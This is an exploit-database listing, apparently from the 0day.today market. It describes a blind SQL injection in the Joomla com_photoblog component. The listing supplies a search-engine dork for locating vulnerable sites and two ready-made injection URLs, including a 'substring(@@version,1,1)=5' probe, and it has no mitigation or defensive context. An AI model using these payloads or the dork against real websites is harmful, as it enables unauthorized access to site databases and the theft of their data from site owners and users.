[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla Component (com_photoblog) Blind Sql Injection Vulnerability

Author
altbta
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10770
Category
web applications
Date add
06-02-2010
Platform
unsorted
==================================================================
Joomla Component (com_photoblog) Blind Sql Injection Vulnerability
==================================================================

.:. Script : Joomla
.:. Download Script: http://webguerilla.net/downloads/3-components-for-joomla-1
.:. Bug Type : Blind Sql Injection
.:. Dork : inurl:"com_photoblog"

===[ Exploit ]===
 
www.site.com/detail.php?id=[Blind<http://www.site.com/detail.php?id=[Blind> SQL INJECTION]
 
 
www.site.com/index.php?option=com_photoblog&view=images&category=1&celebs&blog=1+and<http://www.site.com/index.php?option=com_photoblog&view=images&category=1&celebs&blog=1+and> substring(@@version,1,1)=5



#  0day.today [2024-11-15]  #